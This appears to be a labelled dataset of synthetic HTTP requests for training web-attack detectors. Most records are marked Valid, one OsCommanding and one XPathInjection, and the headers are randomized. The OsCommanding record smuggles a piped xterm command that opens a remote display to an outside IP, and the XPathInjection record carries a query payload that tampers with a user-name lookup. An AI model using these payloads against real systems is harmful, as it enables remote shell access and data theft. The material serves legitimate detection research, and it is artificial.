GET /oem/rAS2u9LJ3X456ylgiT72/oBty/yjkYH/reoebi/jIunionFin/esnan/WLSzHW/pLr0S_b7p3.sh?eicdualjb4ceevs=rmebyge6fbsr&Ela=09&atooisshlu=include%24is0ascriptn+%3Aswp-hoFo+f0dEo&ZPlocationusrts=6966500&itr3hlgm=8&6inot=seetelnetetcp HTTP/1.1
Host: 242.212.46.247:80
Connection: keep-alive
Accept: text/*;q=0.3, application/rtf;q=0.2
Accept-Charset: x-mac-icelandic, x-mac-arabic, x-mac-hebrew
Accept-Encoding: deflate
Accept-Language: sosn-8revr;q=0.8, opo4-1h, hcu-hftjf;q=0.6, lnysieho-tl6h, el-onb;q=0.1
Cache-Control: no-transform
Client-ip: 181.101.138.119
Cookie: 22kbpO4xW=t$qy;@7stdinUFFHIf@=mlE\t;a(alcmdherinoess;atr=004307512
Cookie2: $Version="260"
Date: Thu, 20 May 04 06:04:19 CET
ETag: "V1Ukz5yUSE9xeel"
Expect: mawCxs=r1To9ee
From: e8g1@ha9sec5.ch
If-Modified-Since: Thu, 16 Nov 06 20:03:04 CET
If-Unmodified-Since: Wed, 28 Jan 09 02:41:58 UTC
If-Match: *
If-None-Match: "9WP84YsxYwUb8_hGHA"
If-Range: Tue, 08 Nov 05 13:52:40 GMT
Max-Forwards: 43
MIME-Version: 9.8
Pragma: jnclnmin=ri
Proxy-Authorization: Digest response="03f5CBdFe1b3b7aFaCeAB191f27Fe5e8"
Authorization: nrgl iRvofLd=peoha
Range: 61288-04731,214-935
Referer: http://www.a9k7paR.gov/lnGso/1oieEi.cfm
TE: deflate,gzip
Trailer: Host
User-Agent: Mozilla/3.4 (Windows; U; Windows NT 9.4; ny-on; rv:1.0.5) Gecko/45033064
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1274x3966
Via: HTTP/1.3 www.swtc5ku.jpeg
Transfer-Encoding: nmlx; esptgh=acSlit4a
Upgrade: bf6/1.0, t7Oteo/2.2, sdo/9.0, olyo2o/7.4, ivryva/4.0
Warning: 402 www.8iitaqp.shtml "eenh8nejpamwsHv" "Wed, 04 May 05 21:54:36 GMT"
X-Forwarded-For: 183.96.196.152
X-Serial-Number: 568060558126
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24405
Start - Id: 28546
class: Valid
GET /fnvecdwtliubija/eX9qR2z5/XUFN6mcC@14C/ctg.jpg?Otawctqizp=dnbsefultwr%40mo&AitssMSumsmio=%5D6tp&eilmeoo5rsaofo2=ttuen&Xpx0nrao=epmlyhets4tyet&ooOiaede1ctrqbR=+ HTTP/1.1
Host: www.nTpypaeees.com
Connection: keep-alive
Accept: audio/*, video/*;q=0.8
Accept-Charset: windows-1254
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 81.119.248.8
Cookie: bz=hb3aVsUJ;NrejkdE=Cne-b
Cookie2: $Version="4"
Date: Sat, 24 Jan 04 13:15:22 GMT
ETag: W/"d8l7kAzDFiLNc-Wyw3GV"
Expect: qndes
From: tuezrt@nexhlht5a.it
If-Modified-Since: Thu, 10 Jan 08 13:55:35 GMT
If-Unmodified-Since: Sat, 27 Nov 04 19:53:18 CET
If-Match: *
If-None-Match: "6BSRBGQdCE9kRZ3"
If-Range: Sun, 24 Jan 10 18:26:49 GMT
Max-Forwards: 1028
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest username="5oto"
Authorization: Digest realm
Range: 6-267184,-1,5-7119
Referer: /baqe/uvahiA/eihgmr/s4aic.wmn
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.7 (compatible; aot4; Win98; roiel; 1bSdbmnjt)
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6545x8948
Via: 6.3 www.itJie.tiff, FTP/8.5 252.117.153.59, elo/9.7 5.128.41.173
Transfer-Encoding: 5ints
Upgrade: lpo3mi/8.1, yla/6.6, eiam4/2.9
Warning: 013 38.161.125.54 "rsGoemitnia" 
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 37650652134780806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28546
Start - Id: 43014
class: OsCommanding
PUT /tnts6xbuaiddryena/EtXiZeftpkH/uFcbE.W-4-H@i/lTelse/R5G7hVnodeQfhavingAd42/es/dwbFD4MIMPDuNUDpuR2/uvD1/lN4Z.htm? HTTP/1.1
Content-Length: 313
Content-Language: S,eo3eth6
Content-Encoding: gzip
Content-Location: /vtnsu/jotmA5n.asmx
Content-MD5: eDV5ZW5iZlR4dXRlYXFpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Jun 05 15:29:56 CET
Last-Modified: Mon, 14 Dec 09 19:07:25 GMT
Host: 55.74.122.115
Connection: tnxy
Accept: audio/*;q=0.2, audio/x-wav, image/png
Accept-Charset: iso-2022-kr;q=0.1, windows-1252;q=0.7, iso-8859-9;q=0.4, x-mac-turkish;q=0.2, euc-cn
Accept-Encoding: gzip, gzip, gzip;q=0.4, deflate;q=0.4, identity
Accept-Language: netn-Jas;q=0.8, ahNy-ahEi
Cache-Control: max-age=3
Client-ip: 87.239.190.162
Cookie: becR=tv1ipseTO93ikueen;htccutys4=-forme m;wei8btv=t_BB9DfsE;tmpklhpLZ25@tmpD= ;dhdlle8hbuess=I;ewaixAeovuotm=oitae7es 4jz
Cookie2: $Version="073"
Date: Wed, 12 Sep 07 24:46:09 UTC
ETag: "v0-1@Rv2TACZbOUJTaV"
Expect: ltfreq
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Mon, 12 Mar 07 20:26:42 GMT
If-Unmodified-Since: Sat, 26 Aug 06 23:07:08 CET
If-Match: *
If-None-Match: "zPkp0T972@vgRuHz"
If-Range: "gI5FGGrGt_9N7wjZ"
Max-Forwards: 428
Pragma: no-cache
Proxy-Authorization: Basic c3Nya3BzZWk6VGlhaUdp
Authorization: Digest realm
Range: 171-10,013-0,-6
Referer: http://hdeaas.cz/rhixesr/aMhu/veofD1on/dacsaj/edlN.tar
TE: chunked;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 1.9; es-di; rv:0.3.4) Gecko/64422631
UA-Color: color8
UA-Pixels: 2695x320
Via: 8.2 58.206.38.17, HTTP/4.6 www.7zsmfo0.htm:52652
Transfer-Encoding: gzip
Upgrade: 0yU/2.3, ikP/9.3, iaY/2.4, vete/4.6, SjSgdt/2.7
Warning: 165 65.108.226.121 "iitydon3trejesioefo" "Sun, 09 Oct 05 21:24:18 UTC"
X-Forwarded-For: 225.212.15.105
----: -------------
~~~~~: ~~~~~~~~~~~~~~

Jeloldrwhjxlh=zG@&kipndcodrty8hra=e6ZtpKLWSQ&gg-tC2between=ySwnetr&cij6o3tebrempd=njS h6uuoremkw&sutmnSzeeofp=nzae1wghotbnfio&Itamoer9ms5tsm=havingiologhe(D6y8c/soic t<&jhuoxqkja2tde=0v&mhhewco4okw=so&psJ6kc=|     /usr/openwin/bin/xterm+-display+173.108.150.35:0%00&v7=ecT@7EJ&ednp=tjp

End - Id: 43014
Start - Id: 48880
class: XPathInjection
GET /uOyDf_qy3.mspx?ypadminrWDTL=oacli5tirtten9e3ma&aneepkO=560766&nnrE9g=iA&jtbkeccR=vBersratoweheH&Ehc6lqdTome9=p4%27%5D+%7C+++P++%7C+++++%2F%2Fuser%5B++++name%2Ftext%28++++%29%3D+++%27ofo&q9Nnj1K2=caim%2Fyggou%3Eu1agwcfsj&LcgS1qQtc=e6n4i&14hTreoxo=ayrnioeeriSte HTTP/1.0
Host: www.4iuo.gov
Connection: close
Accept: application/postscript, application/x-tar, video/mpeg;q=0.3
Accept-Charset: euc-cn;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=19
Client-ip: 220.116.206.243
Cookie: slTsx=1dnin9uUbetween;SttcrsokTa=ier7oEabIl;HmJcGwget66wzcG=mPZi
Cookie2: $Version="4"
Date: Tue, 02 Nov 04 22:53:10 GMT
ETag: W/"Mj-Eio7TkEq3Umg"
Expect: 5iusOoAi
From: SeqnAyso@nknWroo.ch
If-Modified-Since: Tue, 12 Sep 06 03:58:56 CET
If-Unmodified-Since: Fri, 19 Dec 08 10:44:08 CET
If-Match: *
If-None-Match: "xZBam07P2VwFIbTCYU"
If-Range: Sun, 27 Sep 09 23:27:54 CET
Max-Forwards: 78
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: Digest realm
Range: 41-,-69
Referer: http://bem6nh1.ch/xeertWSA/weeebfc/ot5f.pl
TE: gzip,trailers,deflate
Trailer: Accept-Charset
User-Agent: Mozilla/5.8 (Windows; U; WinNT 9.7; jz-dc; rv:7.3.0) Gecko/11562664
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 7.7 97.121.81.243, cued/7.1 www.febo.tiff
Transfer-Encoding: dvsA
Upgrade: w3tl/4.7, o4Ow/6.6
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48880
Start - Id: 32307
class: Valid
GET /rnueenn1r2xeg/@EppXInulls4z/oKYo_tV0gRqE3LJKGu/9aGRC2@2m7bYa0/taadtAeoS9nas23ijsrk.cfm?dh6pR54gmmhtddE=m&_RtelnetXF=cEMjn7jfk5&ecro=he&mohnEvp3=%26dsulnetcatffeDtveTSu&oma=0sns0a%3BnrhttpV2pt%27ke&iiduo9ug=276&zxshutdown@Xo=deSrzore0lcmstAHac&ui=0&s8mRaoa=nF5Bp_PG&eRroamhtmiieq=8gbinalinknte&iades=899557549&hoetihC94=rUYrs&y9I=ywlservicesesex%26%3Ae HTTP/1.1
Host: www.ehgpwtlk.com:8
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=8087
Client-ip: 79.79.59.11
Cookie: l8ca=Bsn-5CEjn;ikxe=o;aeetaroese=s<iopheiframerTsr;eFslfnwmlc=n@U5CgUdNxXO
Cookie2: $Version="6"
Date: Thu, 21 Dec 06 06:55:11 UTC
ETag: W/"PwGVrzKVjv.b6qx3Q"
Expect: cpw4Y
From: dyhd@dppe.gov
If-Modified-Since: Fri, 11 May 07 11:49:57 GMT
If-Unmodified-Since: Sat, 27 Sep 08 24:54:51 CET
If-Match: *
If-None-Match: "Djq4D@TZfVUWuMhyA"
If-Range: Thu, 18 Sep 08 13:14:01 UTC
Max-Forwards: 623
MIME-Version: 9.5
Pragma: an1r=mmen
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: Digest algorithm=cw74ee
Range: 03424-,9-
Referer: /aonyone/sdup/tn7r5/c1fkp.gif
TE: chunked,gzip,trailers
Trailer: Warning
User-Agent: wo0aofs9a4 (tDSSnNyL7; tWX02_wI)
UA-CPU: StrongARM
UA-Disp: 096,809,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7929x149
Via: FTP/1.4 www.detleovs.shtml
Transfer-Encoding: compress
Upgrade: isLo/1.1, ii6oo9/3.4, yei/5.6
Warning: 144 36.5.81.66 "nisieeaPsv62Lonttai" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 298337
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32307
Start - Id: 7915
class: Valid
POST /oa/uao5zL3Kl/pYhysX/8rnEsdt5edehdpwnutn/1pqua2s/lWUGQBGkYwY/ttE5hsE/qwinntZI/nXdVTNWiZ/z8optgS7rmzh7/38sjntu533d.mspx? HTTP/1.0
Content-Length: 93
Content-Language: end
Content-Encoding: gzip
Content-Location: http://www.ttami.cz/rssb.jpeg
Content-MD5: cmt1ZXRycnRzczhzb3luYg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Dec 07 17:51:59 UTC
Last-Modified: Sun, 16 Aug 09 09:59:23 UTC
Host: www.esEh0wgde.de
Connection: close
Accept: video/quicktime, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=47
Client-ip: 252.220.146.5
Cookie: sBhtnm5a=10472;5wEU21=aen4ysd;bf3xane=a1e6iNbn2oqlraiin;esjncFoe=uu;Awerolrutegena=Hosttsa
Cookie2: $Version="566"
Date: Fri, 12 Nov 04 05:03:09 CET
ETag: W/"PmnR7UTQ8v8R78UvZu"
Expect: rf0Ir=O8sro
From: ef1i1ii0@9rAe.st
If-Modified-Since: Sun, 09 Oct 05 10:09:47 UTC
If-Unmodified-Since: Sun, 15 Nov 09 15:33:28 GMT
If-Match: "8CrOh@.x3HR7HzCk"
If-None-Match: "kxlPy_ZCLAg3zCMLf"
If-Range: Fri, 23 Nov 07 14:52:09 UTC
Max-Forwards: 3875
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest username="sceiDcRc"
Authorization: Basic ZWh0Y2hwdzp4MnRlTw==
Range: -7290,-491,343026-
Referer: /RmNetla/dp9inle/ini2/aosan.sh
TE: trailers,deflate;q=0.9,trailers
Trailer: If-Range
User-Agent: otv3 (9Eo5IV0; ieRdznyJu1; eeZBGgX5oH; wFTX0h@sa0)
UA-CPU: StrongARM
UA-Disp: 9422,2675,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 422x9444
Via: HTTP/1.3 www.edhw1n.jpeg, me0en/0.7 145.161.167.64, sNtr/1.5 www.trul.html
Transfer-Encoding: hdsu; st8uehR=eucRd
Upgrade: 9cs/4.0
Warning: 977 149.105.53.80 "sbonttde" 
X-Forwarded-For: 179.151.107.237
X-Serial-Number: 534170749
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ueRana=126472239&5JNEogT=7thol0A&rsock_streamIu_Fiframexrls=Mib&m6VPhavingQt=es5ZpO&ahRba=v_7

End - Id: 7915
Start - Id: 23368
class: Valid
GET /evhriIie2etbdtt/Vs03aUYaD.9/set/t7/i45n/i9uLyD5.STzeweW1cQG9/cIyrIiz@PhR0XYws6c/teE8tcherae/9inhsizsltkheorrir/nNqqK34tV1YB16/oiften/zVUX9hQ66b.asp?hDih8uvzrTcqget=inputna+c HTTP/1.0
Host: www.hsml.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=6960
Client-ip: 254.183.167.167
Cookie: nsdkkeeNoSs=1;hWQ8=n1L/;robbami=kuHmnhaotjl;DCs1NE=6645457738
Cookie2: $Version="5"
Date: Fri, 23 Nov 07 24:13:58 CET
ETag: W/"iv4in8bEV@NSy7T@W"
Expect: rhdsost
From: qecc6wa@Qsan.org
If-Modified-Since: Fri, 23 Jan 09 24:03:31 GMT
If-Unmodified-Since: Sun, 14 Oct 07 20:31:11 GMT
If-Match: *
If-None-Match: *
If-Range: "b_sYldR9OGdxRNBKuqiz"
Max-Forwards: 3
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: tely Nkxo8iE=7tmeoIkc
Range: -83
Referer: http://www.Eradog.gov/4BctD/rhyynu.php3
TE: trailers,chunked;q=0.8
Trailer: Trailer
User-Agent: erEs (sZbe8l; yK8HPYvUeU; l@az6pQ; a-uUrDNJXU; alXbXedB)
UA-CPU: Sparc
UA-Disp: 677,8577,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 487x066
Via: HTTP/3.2 www.Ag9cgee.htm
Transfer-Encoding: identity
Upgrade: c0ht/7.6, urttz/8.9, tEtas/4.0, ann/7.5
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 996709990396001467
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23368
Start - Id: 4789
class: Valid
PUT /stTbr3C2eoeQLhn/mAC5OfU05xp8X.gif? HTTP/1.1
Content-Length: 258
Content-Language: nega,7Tm,l3cbmh
Content-Encoding: identity
Content-Location: /chronie/Syvaady/mrs8at47/eebon8sp.htm
Content-MD5: aWRtbmFDblNobmFvVGE2aA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 Jan 10 24:09:23 UTC
Last-Modified: Mon, 09 Apr 07 17:52:16 UTC
Host: www.yebey.st
Connection: lgscEb
Accept: image/*
Accept-Charset: windows-1254, windows-874, iso-8859-8-i;q=0.4
Accept-Encoding: gzip, identity;q=0.2, compress;q=0.5, gzip;q=0.4
Accept-Language: 44fmae-1dAcvref, vfe-oeodd;q=0.5, Tee-Cf
Cache-Control: max-age=02972
Client-ip: 167.64.229.194
Cookie: acecmdnLzna=07868;nezboltCUltw=ht0;prae=orapsr+oet/cOstdin;udvCtEGnetcat_=56474831
Cookie2: $Version="55"
Date: Sat, 11 Sep 04 16:45:36 GMT
ETag: W/"sHkaUAzdlA81iGEiB5"
Expect: Iprdam=teEeori;se5u=hemeva
From: 9mwiN@6woe1E.net
If-Modified-Since: Sat, 05 Nov 05 14:48:34 CET
If-Unmodified-Since: Tue, 21 Feb 06 03:27:44 UTC
If-Match: "-cm45Wo30Wg7JO6trK"
If-None-Match: *
If-Range: Wed, 06 Jan 10 22:55:38 CET
Max-Forwards: 8017
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: Digest opaque="lnsc5rn"
Range: 1757-72,-28304,0-
Referer: /doer/1jihe/gecl/w1b4h.php3
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.7 (Windows; U; WinNT 3.2; O7-xo; rv:7.0.3) Gecko/49898663
UA-CPU: x86
UA-Disp: 109,747,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 904x222
Via: eS8b/2.9 89.204.18.190, FTP/8.7 www.t9afzKan.htm:7853, FTP/7.5 www.ttdeatb.jpg:9
Transfer-Encoding: Nmh8
Upgrade: shd/9.1
Warning: 506 www.bcgemiMn.js "isiToeb" 
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 095672914255730
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

u5liikctArisd=23136602&j8taelnEohR=oezohen1&mBnoaEtL=nIQPmbyhx&pleyt420=aHHZ0H&dsysmrimnlw=n@tFCH1JY&ssd7sat=8KNUB_Bv0pK&hacetadehIth9e=lGi&ip=ol4?eao&ntntdla9tO=976139636&s9WwOtsod4l=7358&lmeqtbtroleexa=zvc &UMgoptDZ=services9ia&xcR=5727&tya=Maccess_log

End - Id: 4789
Start - Id: 23317
class: Valid
GET /htspaur/elngisbfulu0r/sbn/spglx7Yn0/eh/si04pC0.cgi? HTTP/1.1
Host: 131.177.65.64
Connection: ywgt
Accept: */*;q=0.8
Accept-Charset: hz-gb-2312, x-mac-chinesetrad;q=0.0
Accept-Encoding: deflate;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 118.31.94.250
Cookie: tmuaaOntn0npii=42;ntwRcutnen=f0amrhpasl
Cookie2: $Version="186"
Date: Sun, 17 Apr 05 23:34:52 CET
ETag: W/"ynrqS@txFebq1J5v8"
Expect: wfeett=tsteey
From: nj1rhh3i@oh7torqhee.uk
If-Modified-Since: Sun, 20 Jun 04 04:42:55 GMT
If-Unmodified-Since: Mon, 28 Mar 05 02:47:31 CET
If-Match: *
If-None-Match: *
If-Range: "9_ZRnZlLemqxrR_atjhi"
Max-Forwards: 770
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM dTBjaEVvb3NzUm92c2Jvc2xvcW05UllvMWxpcG5hVGUwZWVuZHRkb3Ns
Authorization: Digest cnonce="ahusit"
Range: 56641-,-4,2-
Referer: http://qplht.de/e3xrs/sonf/nllns.swf
TE: deflate,trailers
Trailer: Accept
User-Agent: w_p8b@qH http://www.piI1.cz
UA-CPU: PowerPC
UA-Disp: 904,7964,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9006x6282
Via: 4.3 216.67.141.109
Transfer-Encoding: deflate
Upgrade: eeer/9.5, ezn/0.2, eeM/5.1, hiAKQE/1.2
Warning: 614 www.eyqtEs.shtml "o4SsAiadTpu" "Mon, 26 Jul 04 10:18:10 GMT"
X-Forwarded-For: 93.28.77.128
X-Serial-Number: 22361064185048
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23317
Start - Id: 21242
class: Valid
GET /7uxW/t9H-/ymItfnorep3oUeaehau/m7jyEwy4D6Ppassthru/D9pc9jiR4bNvbscript/efrl6smctcdIotwemrex/XNDtB.J/lB5EhrYGO42PDTJrNlAK/ehk/gRPk7eeUlbcox2h/uUanrl9nStajsunSp.pl?lYWpj-qtgF=423476788&Sn7sAe=e&AU9mhVVjxX=dGR72mf%40&rtaa=eroaM&mosini9dh=893967549&oi=1si&eisAirk2=279661&t9MAwTribn=e+a&daeno=l9U&oeHf=2&hi=hservicesdseopassthrunc%40%27es+3&rtoaasandeol=0neo54ngymt&Et2noh368m7=eZ8QsRRl1Jb&min23=%3E%26 HTTP/1.1
Host: 184.148.179.229
Connection: iohii
Accept: video/quicktime;q=0.5, image/*, video/mpeg;q=0.3
Accept-Charset: x-mac-korean;q=0.4
Accept-Encoding: compress;q=0.2, identity, identity, compress
Accept-Language: rata-e;q=0.1, iyfh-mltsce, aIob-igid;q=0.1, vy-etth;q=0.5, hftepcrs-setedadT;q=0.6
Cache-Control: min-fresh=90581
Client-ip: 228.188.144.29
Cookie: asriideroztcaoe=cXp2BNL1;tepeoOie=o;tiiotiTien=y6Ij;rasrggn7=8
Cookie2: $Version="80"
Date: Mon, 03 Sep 07 24:48:05 GMT
ETag: "Pn7wpUNRDgZuyN1"
Expect: 100-continue
From: xlttati@m2ttsnraoo.uk
If-Modified-Since: Sat, 10 Apr 04 01:35:44 CET
If-Unmodified-Since: Fri, 06 May 05 09:50:32 CET
If-Match: "203lV5qKiyV_vdT0qy."
If-None-Match: "F.wh-7tlxmgZmqE"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Range: 514-56,34-,2775-22974
Referer: http://www.orxAsllo.gov/gaus/peihei/owgh5lz/ERAe/nwna.jpg
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.7 (compatible; 5wafr; SunOS sun4u; yooEjsu)
UA-CPU: PowerPC
UA-Disp: 664,7142,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 412x6900
Via: FTP/3.0 224.187.210.24, 1.4 www.eNztnn.gif:09, 5.9 56.85.12.131
Transfer-Encoding: gzip
Upgrade: haa/9.3, huv3/3.6, doiifo/1.0
Warning: 105 220.45.75.184:10 "ytobtcpe0cmlaiagf7in" "Sun, 01 Jan 06 03:01:20 CET"
X-Forwarded-For: 243.148.157.212
X-Serial-Number: 323295
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21242
Start - Id: 6331
class: Valid
PUT /fcxrodsPahonSelt2io.htm? HTTP/1.1
Content-Length: 60
Content-Language: lu8ame,tRN,lrqa
Content-Encoding: deflate
Content-Location: /6qcGv1/h8Aahw/oe0on/PxghsgS9.php3
Content-MD5: b2FzQWRBc2psdGNuZWJ0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Nov 09 09:19:26 CET
Last-Modified: Thu, 03 Jul 08 02:02:55 CET
Host: 90.117.139.223
Connection: close
Accept: text/*, video/*
Accept-Charset: iso-10646-ucs-2;q=0.0, iso-2022-kr, euc-cn;q=0.1, x-mac-icelandic, isiri-3342
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 95.211.44.64
Cookie: oaeq0anncik=er9kuiiabzlti;opl4dttmos=lsv a/nOcidlno'n;tetiom2=640880
Cookie2: $Version="92"
Date: Tue, 10 Feb 09 14:05:28 UTC
ETag: W/"Sgyoq7YWlPMw.Jg"
Expect: ftNU1=4o9e;woinqeV
From: ai8tEt@dHaaiz4iys.net
If-Modified-Since: Sat, 07 Oct 06 16:09:25 GMT
If-Unmodified-Since: Sun, 30 Sep 07 22:22:43 UTC
If-Match: "XdUstGpRhyb30sBoq"
If-None-Match: *
If-Range: *
Max-Forwards: 8342
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bWN6YTNlbmV0TnJldG5pb2VudWVzdW42amU1cnJwZnNwZWxuNWZseXRzY2Fs
Authorization: NTLM b290c2V0c3NXYWJjZmxnZGFsc3MwTUhtdGVlYmhva3RTZTRjdExpbG5laWUzdA==
Range: 137601-
Referer: http://6ncvrp.org/mah5iai.js
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.2 (Windows; U; Win 9x 9.8; ec-i5; rv:1.0.7) Gecko/89547846
UA-CPU: PowerPC
UA-Disp: 373,864,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9611x0201
Via: HTTP/3.6 172.35.125.62:4933, FTP/4.9 209.112.53.149:61, FTP/1.3 www.tweainnr.jpg:690
Transfer-Encoding: deflate
Upgrade: mnlEe/6.9, ss49D/6.8
Warning: 839 www.tnrahe.tiff "deguewo" "Sun, 11 Dec 05 01:27:46 UTC"
X-Forwarded-For: 150.186.242.245
X-Serial-Number: 9387717978
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

FDauaereee=47273&hs5nt2ri=56499&h7ie3i7bhr4=667&tfmnZDptAl=7

End - Id: 6331
Start - Id: 5829
class: Valid
PUT /rb_wYKt9lVMzzyDL30/leeUHOcBt/aPGFF0T_Odej0ZCQdrIW/dgrf/ee/S6HqhwhereSjL1Q/K14q/7eKSrY6/lmhhz.nsf? HTTP/1.0
Content-Length: 221
Content-Language: cnafi
Content-Encoding: identity
Content-Location: /ie5Ln9.cfm
Content-MD5: MGF0YnRlc3NyM0hnc2gwYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Jan 07 23:46:49 UTC
Last-Modified: Thu, 22 Apr 04 03:27:05 UTC
Host: www.usz2m.gov
Connection: apcitRrp
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eee8-gfm;q=0.2, ToaD-bfx;q=0.1, 59q-es, rreEle5u-Snytz4a
Cache-Control: ssrcg=rMoraq
Client-ip: 109.157.141.38
Cookie: Rh=65236084
Cookie2: $Version="05"
Date: Sat, 28 Mar 09 10:25:10 UTC
ETag: W/"IOnnZpGFB8wh@D0eymlY"
Expect: De4wfa
From: uidosta@cHrc6eaEh.fr
If-Modified-Since: Sat, 27 Dec 08 10:53:54 CET
If-Unmodified-Since: Wed, 15 Oct 08 23:48:33 GMT
If-Match: "ClSKCmduN@bpGgQtZk"
If-None-Match: *
If-Range: Tue, 05 Oct 04 08:17:13 UTC
Max-Forwards: 8692
MIME-Version: 2.2
Pragma: w=u2ajsiiw
Proxy-Authorization: NTLM dHdzcGVzcnZudGhiTmhlbXRkaGZkZXJvOXBrMGhjZXN1MmFyaHRubm8=
Authorization: Basic YWVlTjpldHA4Y2lt
Range: 8139-781351,-939422,275351-
Referer: http://tprEaEna.gov/lszed/8rrat/loYeor.asmx
TE: trailers,chunked;q=0.8
Trailer: Accept
User-Agent: kcna8S/6.1.9.7.1
UA-CPU: MIPS
UA-Disp: 1618,105,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1021x7299
Via: 4.1 www.d5Aeb.css:08, 0.9 231.83.121.77, 7.0 41.228.137.234:1366
Transfer-Encoding: deflate
Upgrade: rES/6.3
Warning: 755 www.nlkObec.css "1rjdirwgsHi" 
X-Forwarded-For: 238.36.196.14
X-Serial-Number: 8692230651
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

srorQmwftts2to=3792&input-X2M5mB=ceOfaetleu2OduoGn&aD=isp ieWyh&reehphe=0d7&sf0l9iaoeuEyti7=0-o&Em=eautoexec:e&mt5eer5e1yRimed=Eoht&3it6dnaiO=ole&NwxbruwRe6aEiww=harsitqo&gecan4uu9osiueu=71&bcocw=80954&amufd=uebiNrmopue

End - Id: 5829
Start - Id: 34833
class: Valid
POST /.8t_Zw/WMmkCLJv5a/kC7uX6td.YwNkDD-QVp/jm-s2.ljA470KB/oquwvz/5el00gwld6snteo/lQI@X2N5_lpO-Cb/Gr/iIHlB2IauB2lT9-Oxks.dll? HTTP/1.0
Content-Length: 225
Content-Language: nn,oeo6
Content-Encoding: deflate
Content-Location: /irh03s/Oeorrse/sjnht/ahSi/wt9jeou.conf
Content-MD5: dGluc2FsNmhyc0ZzaWUyag==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Apr 04 07:29:50 CET
Last-Modified: Wed, 28 Jul 04 02:57:27 CET
Host: www.0ijeh.uk
Connection: nhdnie
Accept: */*;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, gzip, identity;q=0.4, identity;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 16.40.155.255
Cookie: dauayrrieedtoaa=awpv7Raq;eeentene6v=snl1waarl c1
Cookie2: $Version="488"
Date: Wed, 21 Feb 07 19:26:00 UTC
ETag: W/"bqeMAefW9cPM72PS"
Expect: 100-continue
From: i8g2jct@4te48.fr
